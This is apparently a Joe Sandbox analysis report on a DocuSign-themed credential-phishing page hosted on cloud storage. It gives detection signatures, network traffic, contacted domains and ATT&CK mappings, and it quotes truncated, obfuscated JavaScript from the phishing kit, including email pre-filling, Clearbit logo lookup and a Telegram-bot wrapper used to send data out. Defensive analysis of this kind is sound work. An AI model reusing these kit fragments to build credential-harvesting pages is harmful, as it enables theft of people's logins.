Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

Overview

General Information

Sample URL:	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com
Analysis ID:	1587977
Infos:

Detection

HTMLPhisher

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish10

AI detected landing page (webpage, office document or email)

AI detected suspicious Javascript

Javascript uses Clearbit API to dynamically determine company logos

Javascript uses Telegram API

HTML body contains password input but no form action

HTML body with high number of embedded images detected

HTML title does not match URL

Stores files to the Windows start menu directory

URL contains potential PII (phishing indication)

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 6276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1988,i,5427062112202837139,15784603820216315782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_70	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

Avira URL Cloud: detection malicious, Label: phishing

Phishing

AI detected phishing page

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

Joe Sandbox AI: Score: 7 Reasons: The brand 'DocuSign' is well-known and typically associated with the domain 'docusign.com'., The URL 'eu2.contabostorage.com' does not match the legitimate domain for DocuSign., The domain 'contabostorage.com' suggests a cloud storage service, which is not directly related to DocuSign's primary domain., Presence of input fields like 'Password' on a non-legitimate domain is a common phishing tactic., The use of a third-party storage service domain can be a red flag for phishing, especially when associated with a well-known brand like DocuSign. DOM: 0.3.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.2.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.3.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_70, type: DROPPED

AI detected landing page (webpage, office document or email)

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

Joe Sandbox AI: Page contains button: 'View document' Source: '0.1.pages.csv'

AI detected suspicious Javascript

Source: 1.3.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://eu2.contabostorage.com/69e36f1a5de941bb877... This script exhibits several high-risk behaviors, including data exfiltration, redirects to suspicious domains, and obfuscated code. It collects user credentials and sends them to an external server, which is a clear indication of malicious intent. Additionally, the script attempts to redirect the user to a suspicious domain after a failed login attempt. The overall behavior of this script is highly suspicious and poses a significant security risk.

Javascript uses Clearbit API to dynamically determine company logos

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

HTTP Parser: $(document).ready(function () { var _0x2e8f33 = 0; var _0x3d449d = window.location.hash.substr(1); if (!_0x3d449d) { $("#pagecontent").hide(); } else { window.settimeout(function () { $("#pagecontent").show(); $("#mainloader").hide(); }, 3e3); var _0x5b5807 = _0x3d449d.indexof("@"); var _0x1254ec = _0x3d449d.substr(_0x5b5807 + 1); var _0x3eca14 = _0x1254ec.substr(0, _0x1254ec.indexof(".")); var _0x57b930 = _0x3eca14.tolowercase(); $("#email").val(_0x3d449d); $("#faviconpage").attr("href", "https://logo.clearbit.com/" + _0x1254ec); $("#faviconimg").attr("src", "https://logo.clearbit.com/" + _0x1254ec); $("#userdomainicon").attr("src", "https://logo.clearbit.com/" + _0x1254ec); document.title = "sign in with " + _0x1254ec; $("#domain-name").html(_0x57b930); $("#msg").hide(); $("#emailshow").html(_0x3d449d); $("#emailidlable").html(_0x3d449d); } $("#submit-btn").click(function (_0x51d675) { $("#error").hide(); $("#...

Javascript uses Telegram API

Source: https://ip9uk39kv26rml8wjjruzg.on.drv.tw/jsbot.js

HTTP Parser: class telegrambotsetup { constructor(token) { this.token = token; this.requesturl = 'https://api.telegram.org/bot'; } api(type, method, body) { return new promise((resolve, reject) => { fetch(this.requesturl + this.token + type, { method: method, body: body }).then(res => { resolve(res.json()) }).catch(err => { reject(err) }) }) }}class bot extends telegrambotsetup { constructor(bottoken, defaultchatid) { super(bottoken); this.dcid = defaultchatid; } static start() { console.log("send telegram message with js\ndeveloper: https://manuchehr.me\ndocs: https://github.com/manuchekhr32/send-telegram-message-with-js"); } async getupdates() { try { const result = await this.api('/getupdates', 'get') return await result } catch(e) { return await e } } async getme() { try { const result = await this.api('/getme', 'get') r...

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

HTTP Parser: Total embedded image size: 454940

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

HTTP Parser: Title: Sign in with arrowbank.com does not match URL

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Sample URL: PII: phishme@arrowbank.com
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Sample URL: PII: phishme@arrowbank.com
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Sample URL: PII: phishme@arrowbank.com
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Sample URL: PII: phishme@arrowbank.com
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Sample URL: PII: phishme@arrowbank.com
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Sample URL: PII: phishme@arrowbank.com
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Sample URL: PII: phishme@arrowbank.com
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Sample URL: PII: phishme@arrowbank.com

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

HTTP Parser: <input type="password" .../> found

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	HTTP Parser: No <meta name="author".. found
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	HTTP Parser: No <meta name="author".. found
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	HTTP Parser: No <meta name="author".. found
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	HTTP Parser: No <meta name="author".. found

Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	HTTP Parser: No <meta name="copyright".. found
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	HTTP Parser: No <meta name="copyright".. found
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	HTTP Parser: No <meta name="copyright".. found
Source: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49727 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 30MB

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212

Source: global traffic	DNS traffic detected: DNS query: eu2.contabostorage.com
Source: global traffic	DNS traffic detected: DNS query: kit.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: www.w3schools.com
Source: global traffic	DNS traffic detected: DNS query: icones.pro
Source: global traffic	DNS traffic detected: DNS query: ip9uk39kv26rml8wjjruzg-on.drv.tw
Source: global traffic	DNS traffic detected: DNS query: ip9uk39kv26rml8wjjruzg.on.drv.tw
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic	DNS traffic detected: DNS query: loranto.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49727 version: TLS 1.2

Source: classification engine

Classification label: mal80.phis.win@16/13@23/107

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1988,i,5427062112202837139,15784603820216315782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1988,i,5427062112202837139,15784603820216315782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	2 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 Extra Window Memory Injection	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	100%	Avira URL Cloud	phishing

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
d26p066pn2w0s0.cloudfront.net	13.32.27.14	true	false		high
cs837.wac.edgecastcdn.net	192.229.133.221	true	false		unknown
www.google.com	216.58.206.36	true	false		high
loranto.com	85.10.131.132	true	false		unknown
icones.pro	192.0.78.220	true	false		unknown
eu2.contabostorage.com	173.249.62.84	true	true		unknown
als1-pri.drv.tw	34.200.162.253	true	false		unknown
als2-pri.drv.tw	3.217.91.211	true	false		unknown
ip9uk39kv26rml8wjjruzg-on.drv.tw	unknown	unknown	false		unknown
kit.fontawesome.com	unknown	unknown	false		high
ip9uk39kv26rml8wjjruzg.on.drv.tw	unknown	unknown	false		unknown
www.w3schools.com	unknown	unknown	false		high
logo.clearbit.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.64.147.188	unknown	United States		13335	CLOUDFLARENETUS	false
74.125.133.84	unknown	United States		15169	GOOGLEUS	false
34.200.162.253	als1-pri.drv.tw	United States		14618	AMAZON-AESUS	false
172.217.16.206	unknown	United States		15169	GOOGLEUS	false
192.0.78.220	icones.pro	United States		2635	AUTOMATTICUS	false
13.32.27.14	d26p066pn2w0s0.cloudfront.net	United States		7018	ATT-INTERNET4US	false
192.229.133.221	cs837.wac.edgecastcdn.net	United States		15133	EDGECASTUS	false
216.58.206.36	www.google.com	United States		15169	GOOGLEUS	false
142.250.186.106	unknown	United States		15169	GOOGLEUS	false
142.250.185.170	unknown	United States		15169	GOOGLEUS	false
85.10.131.132	loranto.com	France		21283	A1SI-ASA1SlovenijaSI	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
3.217.91.211	als2-pri.drv.tw	United States		14618	AMAZON-AESUS	false
142.250.185.163	unknown	United States		15169	GOOGLEUS	false
172.217.18.106	unknown	United States		15169	GOOGLEUS	false
173.249.62.84	eu2.contabostorage.com	Germany		51167	CONTABODE	true
142.250.186.99	unknown	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587977
Start date and time:	2025-01-10 19:17:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.phis.win@16/13@23/107

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.163, 172.217.16.206, 74.125.133.84, 172.217.18.110, 172.64.147.188, 104.18.40.68, 142.250.186.78, 199.232.214.172, 142.250.186.106, 142.250.185.170, 216.58.212.142
Excluded domains from analysis (whitelisted): kit.fontawesome.com.cdn.cloudflare.net, clients2.google.com, accounts.google.com, redirector.gvt1.com, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com

LLM Input / Output

Input	Output
URL: https://eu2.contabostorage.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://eu2.contabostorage.com
URL: https://eu2.contabostorage.com/69e36f1a5de941bb877... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script demonstrates some moderate-risk behaviors, such as aggressive DOM manipulation and the use of obfuscated code. However, it appears to be a legitimate loading/authentication sequence, and the obfuscation may be a result of minification or other optimization practices. Further review would be needed to determine if there are any malicious intentions behind the script." }
function myFunction() { $('#dButton').hide(); $("#loaderClass").show(); var _0x9f8865 = new Array(); _0x9f8865.push("Authenticating ..."); _0x9f8865.push("Syncing cloud"); _0x9f8865.push("Loading ..."); var _0x1b5bc3 = 0x0; function _0x69ee31() { $("#loaderText").html(_0x9f8865[_0x1b5bc3]); if (_0x1b5bc3 < _0x9f8865.length - 0x1) { _0x1b5bc3++; } else { _0x1b5bc3 = 0x0; } setTimeout(_0x69ee31, 0x3e8); } _0x69ee31(); window.setTimeout(function () { $('#loaderText').hide(); $("#loaderText2").show(); }, 0xbb8); window.setTimeout(function () { $("#loginForm").show(); $('#overlayclass').show(); }, 0xfa0); }
URL: https://ajax.googleapis.com/ajax/libs/jquery/2.1.1... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not exhibit any high-risk behaviors, and the code is not obfuscated or attempting to execute dynamic code. The library is used for common web development tasks and does not pose a significant security risk." }
/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license / !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor(null)},push:f,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]\|\|{},h++),"object"==typeof g\|\|n.isFunction(g)\|\|(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)\|\|(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return 